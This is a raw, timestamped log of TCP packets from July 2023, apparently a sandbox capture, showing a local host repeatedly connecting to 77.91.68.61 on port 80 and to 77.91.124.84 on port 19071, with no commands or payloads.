Jul 27, 2023 01:33:50.993050098 CEST	80	49890	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.993169069 CEST	49890	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.996025085 CEST	80	49891	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:50.996161938 CEST	49891	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:50.996606112 CEST	49891	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.041114092 CEST	80	49891	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.044812918 CEST	80	49891	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.044878960 CEST	49891	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.167820930 CEST	49891	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.168653011 CEST	49892	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.212766886 CEST	80	49892	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.212805986 CEST	80	49891	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.212928057 CEST	49891	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.213377953 CEST	49892	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.213378906 CEST	49892	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.257417917 CEST	80	49892	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.260690928 CEST	80	49892	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.261444092 CEST	49892	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.374867916 CEST	49892	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.375581980 CEST	49893	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.419070959 CEST	80	49892	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.419240952 CEST	49892	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.420120955 CEST	80	49893	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.421427011 CEST	49893	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.422959089 CEST	49893	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.467550039 CEST	80	49893	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.471189976 CEST	80	49893	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.472105026 CEST	49893	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.586741924 CEST	49893	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.587775946 CEST	49894	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.631477118 CEST	80	49893	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.631705046 CEST	49893	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.632283926 CEST	80	49894	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.632441044 CEST	49894	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.632822037 CEST	49894	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.676979065 CEST	80	49894	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.681561947 CEST	80	49894	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.681658983 CEST	49894	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.792527914 CEST	49894	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.794801950 CEST	49895	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.837013960 CEST	80	49894	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.837479115 CEST	49894	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.839427948 CEST	80	49895	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.839559078 CEST	49895	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.877855062 CEST	49895	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:51.922585964 CEST	80	49895	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.927011967 CEST	80	49895	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:51.927150011 CEST	49895	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.326245070 CEST	49895	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.327095985 CEST	49896	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.370914936 CEST	80	49895	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.371346951 CEST	80	49896	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.371438980 CEST	49895	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.371479988 CEST	49896	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.375495911 CEST	49896	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.419576883 CEST	80	49896	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.424171925 CEST	80	49896	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.425060034 CEST	49896	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.545555115 CEST	49896	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.546248913 CEST	49897	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.589863062 CEST	80	49896	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.590550900 CEST	49896	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.590610981 CEST	80	49897	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.590878010 CEST	49897	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.591841936 CEST	49897	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.636079073 CEST	80	49897	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.641124010 CEST	80	49897	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.641201973 CEST	49897	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.789901972 CEST	49897	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.790781975 CEST	49898	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.834156990 CEST	80	49897	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.834700108 CEST	80	49898	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.834822893 CEST	49897	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.834891081 CEST	49898	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.894244909 CEST	49898	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:52.938435078 CEST	80	49898	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.941570044 CEST	80	49898	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:52.941792965 CEST	49898	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.058746099 CEST	49898	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.062100887 CEST	49899	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.102883101 CEST	80	49898	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:53.102967978 CEST	49898	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.106211901 CEST	80	49899	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:53.107594967 CEST	49899	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.131997108 CEST	49899	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.175980091 CEST	80	49899	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:53.179662943 CEST	80	49899	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:53.183412075 CEST	49899	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.679708004 CEST	49899	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.692131042 CEST	49900	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.723999977 CEST	80	49899	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:53.724056959 CEST	49899	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.736959934 CEST	80	49900	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:53.737060070 CEST	49900	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.739263058 CEST	49900	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.784157038 CEST	80	49900	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:53.787466049 CEST	80	49900	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:53.787539005 CEST	49900	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.904243946 CEST	49900	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.905142069 CEST	49901	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.949388027 CEST	80	49900	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:53.949441910 CEST	80	49901	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:53.949490070 CEST	49900	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.949564934 CEST	49901	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:53.986485004 CEST	49901	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:54.030989885 CEST	80	49901	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:54.035423994 CEST	80	49901	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:54.035510063 CEST	49901	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.182311058 CEST	49901	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.191580057 CEST	49902	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.226795912 CEST	80	49901	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:55.226895094 CEST	49901	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.235992908 CEST	80	49902	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:55.236161947 CEST	49902	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.467416048 CEST	49902	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.512001991 CEST	80	49902	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:55.516285896 CEST	80	49902	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:55.516438961 CEST	49902	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.716068983 CEST	49902	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.716938019 CEST	49903	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.760476112 CEST	80	49902	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:55.760580063 CEST	49902	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.761199951 CEST	80	49903	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:55.761321068 CEST	49903	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.773277044 CEST	49903	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.817733049 CEST	80	49903	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:55.821748018 CEST	80	49903	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:55.821948051 CEST	49903	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.951185942 CEST	49903	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.958934069 CEST	49904	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:55.995692015 CEST	80	49903	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:55.995791912 CEST	49903	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.002866030 CEST	80	49904	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.003000975 CEST	49904	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.051050901 CEST	49904	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.095526934 CEST	80	49904	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.099695921 CEST	80	49904	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.099790096 CEST	49904	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.220982075 CEST	49904	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.221698046 CEST	49905	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.265341997 CEST	80	49904	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.265396118 CEST	49904	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.266299963 CEST	80	49905	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.266396046 CEST	49905	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.268786907 CEST	49905	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.313154936 CEST	80	49905	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.316803932 CEST	80	49905	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.316943884 CEST	49905	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.434242010 CEST	49905	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.440980911 CEST	49906	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.478966951 CEST	80	49905	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.479063988 CEST	49905	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.485344887 CEST	80	49906	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.485433102 CEST	49906	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.487083912 CEST	49906	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.531415939 CEST	80	49906	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.535904884 CEST	80	49906	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.536031008 CEST	49906	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.675456047 CEST	49906	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.676146030 CEST	49907	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.719959021 CEST	80	49906	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.720103025 CEST	49906	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.720563889 CEST	80	49907	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.720675945 CEST	49907	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.721050024 CEST	49907	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.765460968 CEST	80	49907	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.769829988 CEST	80	49907	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.769923925 CEST	49907	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.888142109 CEST	49907	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.889091015 CEST	49908	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.932848930 CEST	80	49907	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.932933092 CEST	49907	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.933399916 CEST	80	49908	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.933482885 CEST	49908	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.934418917 CEST	49908	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:56.978763103 CEST	80	49908	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.982660055 CEST	80	49908	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:56.982840061 CEST	49908	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.090778112 CEST	49908	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.092886925 CEST	49909	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.135535002 CEST	80	49908	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.135627985 CEST	49908	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.137407064 CEST	80	49909	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.137515068 CEST	49909	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.137928963 CEST	49909	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.182225943 CEST	80	49909	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.185874939 CEST	80	49909	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.186041117 CEST	49909	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.311032057 CEST	49909	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.312040091 CEST	49910	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.355436087 CEST	80	49909	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.355545998 CEST	49909	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.355969906 CEST	80	49910	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.356085062 CEST	49910	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.357949972 CEST	49910	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.402266026 CEST	80	49910	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.407676935 CEST	80	49910	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.407898903 CEST	49910	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.481316090 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:33:57.512073994 CEST	49910	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.512926102 CEST	49912	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.526376009 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:33:57.526488066 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:33:57.556257010 CEST	80	49910	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.556404114 CEST	49910	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.557214022 CEST	80	49912	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.557320118 CEST	49912	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.557790995 CEST	49912	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.602075100 CEST	80	49912	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.606024981 CEST	80	49912	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.606246948 CEST	49912	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.692502022 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:33:57.722367048 CEST	49912	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.723149061 CEST	49914	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.737255096 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:33:57.737395048 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:33:57.766814947 CEST	80	49912	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.767462969 CEST	80	49914	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.767601013 CEST	49912	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.767621994 CEST	49914	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.768116951 CEST	49914	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.812849998 CEST	80	49914	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.816776037 CEST	80	49914	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.817398071 CEST	49914	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.937577963 CEST	49914	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.945180893 CEST	49915	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.982180119 CEST	80	49914	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.985435963 CEST	49914	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.989279985 CEST	80	49915	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:57.989608049 CEST	49915	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:57.991780043 CEST	49915	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.035871029 CEST	80	49915	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.040488958 CEST	80	49915	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.040575027 CEST	49915	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.152501106 CEST	49915	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.155236006 CEST	49916	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.196971893 CEST	80	49915	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.197103024 CEST	49915	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.199625015 CEST	80	49916	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.199866056 CEST	49916	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.200181007 CEST	49916	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.244565010 CEST	80	49916	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.248454094 CEST	80	49916	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.249305964 CEST	49916	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.369640112 CEST	49916	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.370224953 CEST	49917	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.414333105 CEST	80	49916	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.414459944 CEST	80	49917	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.414455891 CEST	49916	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.414583921 CEST	49917	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.414953947 CEST	49917	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.459496021 CEST	80	49917	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.464489937 CEST	80	49917	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.464602947 CEST	49917	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.575290918 CEST	49917	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.575880051 CEST	49918	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.578886032 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:33:58.619956017 CEST	80	49917	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.620014906 CEST	49917	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.620323896 CEST	80	49918	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.620398045 CEST	49918	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.620796919 CEST	49918	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.624324083 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:33:58.665247917 CEST	80	49918	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.671257019 CEST	80	49918	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.671335936 CEST	49918	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.730123043 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:33:58.777693033 CEST	49918	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.781438112 CEST	49919	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.820066929 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:33:58.822654963 CEST	80	49918	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.822740078 CEST	49918	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.826561928 CEST	80	49919	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.826705933 CEST	49919	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.827035904 CEST	49919	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.865988970 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:33:58.871875048 CEST	80	49919	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.876096964 CEST	80	49919	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:58.876280069 CEST	49919	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.917660952 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:33:58.980937958 CEST	49919	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:58.981662035 CEST	49920	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.025877953 CEST	80	49920	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.025969028 CEST	49920	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.026695013 CEST	80	49919	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.026756048 CEST	49919	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.040071011 CEST	49920	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.084434032 CEST	80	49920	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.087703943 CEST	80	49920	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.087784052 CEST	49920	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.199491978 CEST	49920	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.200092077 CEST	49921	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.244549990 CEST	80	49920	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.244730949 CEST	49920	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.247684956 CEST	80	49921	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.247782946 CEST	49921	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.249136925 CEST	49921	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.293802023 CEST	80	49921	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.298934937 CEST	80	49921	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.299050093 CEST	49921	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.415735960 CEST	49921	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.416487932 CEST	49922	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.460731030 CEST	80	49921	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.460822105 CEST	49921	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.461110115 CEST	80	49922	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.461278915 CEST	49922	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.461668968 CEST	49922	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.506326914 CEST	80	49922	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.511265039 CEST	80	49922	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.511389017 CEST	49922	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.621275902 CEST	49922	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.621917963 CEST	49923	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.666129112 CEST	80	49922	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.666222095 CEST	49922	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.666887045 CEST	80	49923	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.667021990 CEST	49923	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.674391031 CEST	49923	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.719600916 CEST	80	49923	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.723855019 CEST	80	49923	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.723963976 CEST	49923	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.843928099 CEST	49923	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.873687029 CEST	49924	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.888808966 CEST	80	49923	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.889271975 CEST	49923	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.918555975 CEST	80	49924	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.919399977 CEST	49924	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.925554037 CEST	49924	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:59.970212936 CEST	80	49924	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.974993944 CEST	80	49924	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:59.975997925 CEST	49924	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.090944052 CEST	49924	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.114408016 CEST	49925	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:00.136142015 CEST	80	49924	77.91.68.61	192.168.2.5
